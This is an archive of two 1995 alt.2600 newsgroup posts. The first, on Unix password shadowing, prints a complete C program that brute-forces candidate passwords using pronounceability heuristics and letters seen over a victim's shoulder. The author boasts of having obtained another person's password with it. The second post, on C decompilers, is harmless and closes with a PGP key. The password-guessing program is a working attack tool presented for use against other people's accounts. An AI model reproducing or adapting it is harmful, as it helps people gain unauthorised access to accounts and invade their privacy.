Ä &ALT.2600 (1:340/26) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ &ALT.2600 Ä Msg : 371 of 500 From : Virtual Touch 100 1:340/13 09 Dec 95 12:49:56 To : All 09 Dec 95 18:14:04 Subj : Re: UNIX PASSWORD SHADOWING ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ .RFC-Path: news.spydernet.com!nntp.pinc.com!news.bctel.net!imci2!newsfeed.internetmci.com!u wm.edu!lll-winken.llnl.gov!fnnews.fnal.gov!nntp-server.caltech.edu!miikka From: miikka@gluttony.ugcs.caltech.edu (Virtual Touch 100) .RFC-Message-ID: <4acspl$anh@gap.cco.caltech.edu> .RFC-References: <8175052094902@linetap.com> <49hvvp$4jj@batph8.bnr.ca> <49l4se$1bk@wilma.widomaker.com> <49sk6a$2231@bigblue.oit.unc.edu> .RFC-NNTP-Posting-Host: gluttony.ugcs.caltech.edu .RFC-X-Newsreader: NN version 6.5.0 #14 (NOV) >: |i wouldn't post it. Cuz then, the same thing would happen like the >: |MYANIIS #. Unix encryption processes would be changed and made more >: |difficult. Like maybe double encryption or using sixteen character above healthy sceptic (who is totally wrong though) ignored... > Semlling conspiracy in everything can make you a lonely -- and > MISLEAD -- individual. You are wrong. above more knowledgeable responder acknowledged... But it is possible to invert unix passwords, though the inverse is not unique (from nonexistence of inverses of singular transformations)... note singular transformations can still be inverted, but the best you can do is a maybe very large subspace of the original wordspace. Its probably better to take the following route: (I wrote this while drunk last night on a dare so don't laugh too hard at how sh*tty it is: (it worked though, I got the guys password in an hour, given that I saw three keys from his password (though he types so fast I didn't know what order they were in) #include #include #define IS_VOWEL( x ) ( (x)=='a'||(x)=='e'||(x)=='i'||(x)=='o'||(x)=='u'||(dork7==(x)&&(x)=='y')?1:0 ) #define IS_CONS( x ) (!IS_VOWEL( x ) && (x!='a'-1)) /* assumptions to increase speed: */ /* no three vowels in a row */ /* no three consonants in a row */ /* assume y is vowel (bad) */ /* qu j(nav) */ /* maybe later do statistical sweep according to letter statistics */ #define CHECK_V( a , b , c ) if(heur && IS_VOWEL(a) && IS_VOWEL(b) && IS_VOWEL(c) ) continue #define CHECK_C( a , b , c ) if(heur && IS_CONS(a) && IS_CONS(b) && IS_CONS(c) ) continue #define CHECK_QU( a , b ) if(heur && (a)=='q' && (b)!='u') continue #define CHECK_JNAV( a , b ) if(heur && (a)=='j' && IS_CONS(b)) continue #define CHECK_NULL( x ) if( (x)=='a'-1 ) continue #define MAX_WORDS 10000L void main(int argc,char **argv[]) { char letts[10]; char known[10]; int heur=0; int cp,nc_mask; int dork0,dork1,dork2,dork3,dork4,dork5,dork6,dork7=0; long int cnt=0; dork0='a'-1; dork1='a'-1; known[0]=0; letts[0]=0; if(argc>2) { printf("Only argument is letters that are known (if any).\n"); printf("maybe I will add number of keystrokes heard option\n"); printf("argv1,2 %d = %s %s\n",argc,argv[1],argv[2]); exit(0); } if(argc==2) { sprintf(known,"%s\0",argv[1]); printf("known letters are [%s]\n",known); if(strchr(argv[1],'H')) { heur++; printf("using heuristics\n"); } } if(argc==0) { printf("entering heuristics mode\n"); heur++; printf("maybe instead use following options: (not ready)\n\n"); printf("-S:aght known substring ""aght""\n"); printf("-T:aght time ordered chars ""aght""\n"); printf("-K:aght known chars ""aght"" maybe out of order\n"); printf("-L:7 known length 7 characters\n"); printf("-H:qu use heuristic ''u'' always follows ''q''\n"); printf("-M:700 maximum generate 700 passwords\n"); printf("-X:j5 exclude fifth key as ''j''\n"); printf("-F:d3 force third key to be ''d''\n"); printf("-I:6 minimum length 6 characters\n"); printf("-A:7 maximum length 7 characters\n"); heur++; } for(dork0 = 'a'-1; dork0<='z'; dork0++) { for(dork1 = 'a'-1; dork1<='z'; dork1++) { CHECK_QU(dork0,dork1); CHECK_JNAV(dork0,dork1); for(dork2 = 'a'-1; dork2<='z'; dork2++) { CHECK_NULL( dork2 ); CHECK_V(dork0,dork1,dork2); CHECK_C(dork0,dork1,dork2); CHECK_QU(dork1, dork2); CHECK_JNAV(dork1,dork2); for(dork3 = 'a'-1; dork3<='z'; dork3++) { CHECK_NULL( dork3 ); CHECK_V(dork1,dork2,dork3); CHECK_C(dork1,dork2,dork3); CHECK_QU(dork2,dork3); CHECK_JNAV(dork2,dork3); for(dork4 = 'a'-1; dork4<='z'; dork4++) { CHECK_NULL( dork4 ); CHECK_V(dork2,dork3,dork4); CHECK_C(dork2,dork3,dork4); CHECK_QU(dork3,dork4); CHECK_JNAV(dork3,dork4); for(dork5 = 'a'-1; dork5<='z'; dork5++) { CHECK_NULL( dork5 ); CHECK_V(dork3,dork4,dork5); CHECK_C(dork3,dork4,dork5); CHECK_QU(dork4,dork5); CHECK_JNAV(dork4,dork5); for(dork6 = 'a'-1; dork6<='z'; dork6++) { CHECK_NULL( dork6 ); CHECK_V(dork4,dork5,dork6); CHECK_C(dork4,dork5,dork6); CHECK_QU(dork5,dork6); CHECK_JNAV(dork5,dork6); for(dork7 = 'a'-1; dork7<='z'; dork7++) { CHECK_NULL( dork7 ); CHECK_V(dork5,dork6,dork7); CHECK_C(dork5,dork6,dork7); CHECK_QU(dork6,dork7); CHECK_JNAV(dork6,dork7); { letts[0]=dork0; letts[1]=dork1; letts[2]=dork2; letts[3]=dork3; letts[4]=dork4; letts[5]=dork5; letts[6]=dork6; letts[7]=dork7; nc_mask=0; if(argc==2) { for(cp=0;(known[cp]<='z')&&(known[cp]>='a');cp++) { /* scan all known chars */ if(strchr(letts,known[cp])==0) nc_mask++; /* not found means bad */ } } if(nc_mask) continue; if(dork0 != 'a'-1) fprintf(stdout,"%c",dork0); if(dork1 != 'a'-1) fprintf(stdout,"%c",dork1); if(dork2 != 'a'-1) fprintf(stdout,"%c",dork2); if(dork3 != 'a'-1) fprintf(stdout,"%c",dork3); if(dork4 != 'a'-1) fprintf(stdout,"%c",dork4); if(dork5 != 'a'-1) fprintf(stdout,"%c",dork5); if(dork6 != 'a'-1) fprintf(stdout,"%c",dork6); if(dork7 != 'a'-1) fprintf(stdout,"%c",dork7); fprintf(stdout, "\n"); cnt++; if((cnt % 1000)==0) printf("thousand_more\n"); if(cnt>=MAX_WORDS) { printf("Done.\n"); exit(0); } } }}}}}}}} } --- ifmail v.2.8.lwz * Origin: California Institute of Technology, Pasadena (1:340/13@fidonet) Ä &ALT.2600 (1:340/26) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ &ALT.2600 Ä Msg : 365 of 500 From : Virtual Touch 100 1:340/13 09 Dec 95 12:35:00 To : All 09 Dec 95 18:14:00 Subj : Re: decompilers-fact or fiction? ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ .RFC-Path: news.spydernet.com!nntp.pinc.com!news.bctel.net!news.cyberstore.ca!math.ohio-sta te.edu!uwm.edu!lll-winken.llnl.gov!fnnews.fnal.gov!nntp-server.caltech.edu!miikk a From: miikka@gluttony.ugcs.caltech.edu (Virtual Touch 100) .RFC-Message-ID: <4acrtk$9u9@gap.cco.caltech.edu> .RFC-References: <49sfl9$foj@news.ios.com> .RFC-NNTP-Posting-Host: gluttony.ugcs.caltech.edu .RFC-X-Newsreader: NN version 6.5.0 #14 (NOV) joe@soho.ios.com (Kent Robotii) writes: >DOSE ANYONE KNOW WHERE TO GET A DECOMPILER >FOR C AND OR C++? first: quit typing in uppercase, it is considered a signature of a neophyte. second: decompilers exist, I had one but deleted it after the dissappointment. I compiled a very simple program (c=a+b, give a and b hardcoded values) and decompiled it. I got several hundred k of C source/pseudosource out. Unless you are using your own personal home-built compiler with the most primitive possible code generation a decompiler will do you no good, it gets stuck spewing thousands of lines of code to represent relatively simple statements. It may have been that the implementation I was using was poorly designed, since a decompiler is possible given a reversible compilation algorithm. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAy+/DmUAAAEEAJ8xv33LOZTThs1DmWVh+dwxdVKZYmdWuTuYzglIF9fZ3hE7 D93E+pFFRF2we+co90KxXTmkR4qnRQDZVZ39NMqCT/AdazBafSOONtZZfQMMYBfZ s+2wCRmDpyRx7OXBDB0JdrFUZ5hKOXj6wNW7FlTvNvJ5FhQInbGJUbypojHNAAUR tCxNaWlra2EgTS4gS2FuZ2FzIDxtaWlra2FAYWx1bW5pLmNhbHRlY2guZWR1Pg== =/Ro5 -----END PGP PUBLIC KEY BLOCK----- http://www.alumni.caltech.edu/~miikka --- ifmail v.2.8.lwz * Origin: California Institute of Technology, Pasadena (1:340/13@fidonet)